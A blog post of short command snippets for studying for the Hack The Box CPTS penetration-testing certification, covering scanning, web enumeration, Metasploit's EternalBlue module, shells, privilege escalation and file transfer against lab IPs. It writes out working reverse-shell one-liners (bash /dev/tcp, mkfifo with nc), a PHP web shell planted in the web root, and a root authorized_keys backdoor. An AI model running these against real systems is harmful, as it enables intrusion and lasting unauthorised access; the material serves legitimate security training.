Post

CPTS Guide - 1. Getting Started

Posted
CPTS Certification
CPTS Certification
By David Pirneci
5 min read
CPTS Guide - 1. Getting Started

Introduction

The aim of this series is to provide a concise, useful list of commands for the CPTS Hack The Box Certification. These ideas could well be used for CTF challenges, as you will see in the next posts. I will focus on explaining each step carefully and in a format that can be quickly read so you can use this as a reference.

Studying for the CPTS certification means diving deep into practical, hands-on pentesting. It’s not just about knowing tools—it’s about using them efficiently and understanding the why behind every step. That’s where this guide comes in. I’ve put together a clear, organized list of the most important commands you’ll rely on during your CPTS journey—from initial recon to privilege escalation. Each command includes a short explanation so you can quickly recall what it does and when to use it. Whether you’re practicing in labs or tackling the real exam, this guide is designed to save you time, boost your confidence, and keep your workflow sharp.

🧰 Basic Tools

🔧 General

Connects you to the HTB VPN so you can access remote lab machines.

1

sudo openvpn user.ovpn

Shows network interfaces and IP addresses to confirm VPN connectivity.

1

ifconfig

or

1

ip a

Displays the routing table to verify network paths.

1

netstat -rn

Establishes a secure shell session to a remote server.

1

ssh [email protected]

Opens a connection to an FTP server, often used for anonymous access and file retrieval.

1

ftp 10.129.42.253

🪟 tmux (Terminal Multiplexer)

Starts a tmux session for multitasking in terminal panes and windows.

1

tmux

The default prefix key to control tmux.

1

ctrl + b

Creates a new window in tmux, helpful for multitasking.

1

prefix c

Switches to window number 1 inside tmux.

1

prefix 1

Splits the tmux window vertically for side-by-side panes.

1

prefix shift + %

Splits the tmux window horizontally for stacked panes.

1

prefix shift + "

Navigates to the pane on the right.

1

prefix →

📝 Vim

Opens a file in the Vim text editor.

1

vim file

Enters insert mode to begin editing.

1

esc + i

Returns to normal mode to navigate and use commands.

1

esc

Deletes the character under the cursor.

1

x

Deletes the current word.

1

dw

Deletes the current line.

1

dd

Copies the current word.

1

yw

Copies the entire line.

1

yy

Pastes the copied or deleted content.

1

p

Navigates to the first line of the file.

1

:1

Saves the file.

1

:w

Quits Vim.

1

:q

Quits without saving.

1

:q!

Saves and exits.

1

:wq

🛠️ Pentesting

🔍 Service Scanning

Performs a basic nmap scan on a target.

1

nmap 10.129.42.253

Performs a thorough scan with all ports, default scripts, and service/version detection.

1

nmap -sV -sC -p- 10.129.42.253

Searches for custom nmap scripts related to Citrix (or similar).

1

locate scripts/citrix

Runs a specific nmap script against the SMB port.

1

nmap --script smb-os-discovery.nse -p445 10.10.10.40

Checks open port response manually to identify service banner.

1

netcat 10.10.10.10 22

Lists SMB shares on a target, anonymously.

1

smbclient -N -L \\10.129.42.253

Connects to a specific SMB share.

1

smbclient \\10.129.42.253\users

Scans a target’s SNMP for hostname or system info.

1

snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0

Attempts brute force on SNMP community strings.

1

onesixtyone -c dict.txt 10.129.42.254

🌐 Web Enumeration

Performs directory brute-forcing using common wordlist.

1

gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt

Scans for DNS subdomains of a given domain.

1

gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt

Displays HTTP response headers.

1

curl -IL https://www.inlanefreight.com

Fingerprint a web server and its technologies.

1

whatweb 10.10.10.121

Checks for hidden directories in robots.txt.

1

curl 10.10.10.121/robots.txt

Shortcut in Firefox to view page source.

1

ctrl + U

📡 Public Exploits

Searches for known public exploits in the Exploit-DB database.

1

searchsploit openssh 7.2

Launches the Metasploit Framework.

1

msfconsole

Searches for the EternalBlue exploit module.

1

search exploit eternalblue

Loads the MS17-010 EternalBlue exploit module.

1

use exploit/windows/smb/ms17_010_psexec

Displays required settings for the exploit.

1

show options

Specifies the target IP.

1

set RHOSTS 10.10.10.40

Tests if the remote host is vulnerable.

1

check

Executes the exploit.

1

exploit

🐚 Using Shells

Starts a listener for a reverse shell on local port 1234.

1

nc -lvnp 1234

Sends a reverse shell to the attacker’s listener.

1

bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'

Uses named pipes to establish a reverse shell.

1

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

Starts a bind shell listener on the remote machine.

1

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f

Connects to a bind shell already started on the remote machine.

1

nc 10.10.10.1 1234

Upgrades shell to a better TTY using Python.

1

python -c 'import pty; pty.spawn("/bin/bash")'

Another method to upgrade your shell’s interaction.

1
2
3

ctrl + z
stty raw -echo
fg

Creates a simple web shell in PHP.

1

echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.php

Executes a command via your PHP shell.

1

curl http://SERVER_IP:PORT/shell.php?cmd=id

🪜 Privilege Escalation

Runs LinPEAS for Linux privilege escalation checks.

1

./linpeas.sh

Lists current user’s sudo privileges.

1

sudo -l

Runs a command as another user using sudo.

1

sudo -u user /bin/echo Hello World!

Switches to root user if allowed.

1

sudo su -

Switches to another user account.

1

sudo su user -

Generates an SSH keypair.

1

ssh-keygen -f key

Adds your public key to root’s authorized SSH keys.

1

echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys

Logs into remote machine using the SSH key.

1

ssh [email protected] -i key

📂 Transferring Files

Starts a simple Python HTTP server for file transfers.

1

python3 -m http.server 8000

Downloads a file from the attacker’s machine.

1

wget http://10.10.14.1:8000/linpeas.sh

Alternative method using curl to download a file.

1

curl http://10.10.14.1:8000/linenum.sh -o linenum.sh

Securely copy a file to a remote server.

1

scp linenum.sh user@remotehost:/tmp/linenum.sh

Encodes a file in base64 for safe transfer.

1

base64 shell -w 0

Decodes base64 back to the original file.

1

echo f0VMR...SNIO...InmDwU | base64 -d > shell

Checks file integrity via md5sum.

1

md5sum shell

Conclusion

These foundational commands cover a wide range of situations you will face during CPTS challenges — from basic connectivity and text editing, to web and service enumeration, shell management, and privilege escalation. Bookmark this guide, practice these commands, and always understand why you are using them. Stay curious and keep hacking!

Guides, CPTS
web enumeration ctf
This post is licensed under CC BY 4.0 by the author.